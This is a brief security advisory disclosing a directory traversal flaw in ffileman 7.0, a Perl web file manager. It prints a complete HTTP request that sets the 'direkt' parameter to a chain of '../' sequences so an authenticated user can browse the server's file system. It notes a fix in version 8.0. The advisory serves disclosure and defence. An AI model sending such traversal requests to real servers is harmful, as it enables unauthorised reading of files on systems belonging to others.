ffileman v7.0, Directory Traversal Vulnerability

/in

# Author: Raffaele Forte
# Vendor Homepage: https://f-fileman.sourceforge.io/
# Version: ffileman v7.0
# Tested on: Linux

 

I. DESCRIPTION

Directory traversal vulnerabilities has been found in ffileman 7.0 a web based file and directory manager written with Perl.

The vulnerability can be exploited to access local files by entering special characters in variables used to create file paths. The attackers use “../” sequences to move up to root directory, thus permitting navigation through the file system.

The issue discovered can only be exploited with an authenticated session and setting the variable “direkt” like below with a HTTP GET or POST request.

 

Request:

GET http://[webserver IP]/cgi-bin/ffileman.cgi?direkt=../../../../../../../../&kullanici=[username]&sifre=[password]&dizin_git=Vai%20alla%20Directory HTTP/1.1
Host: [webserver IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://[webserver IP]/cgi-bin/ffileman.cgi?direkt=[original path]&kullanici=[username]&sifre=[password]&dizin_git=Vai%20alla%20Directory

 

VI. VULNERABILITY HISTORY
July 17th, 2009: Fixed with version 8.0

 

VII. LEGAL NOTICES
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuseof this information.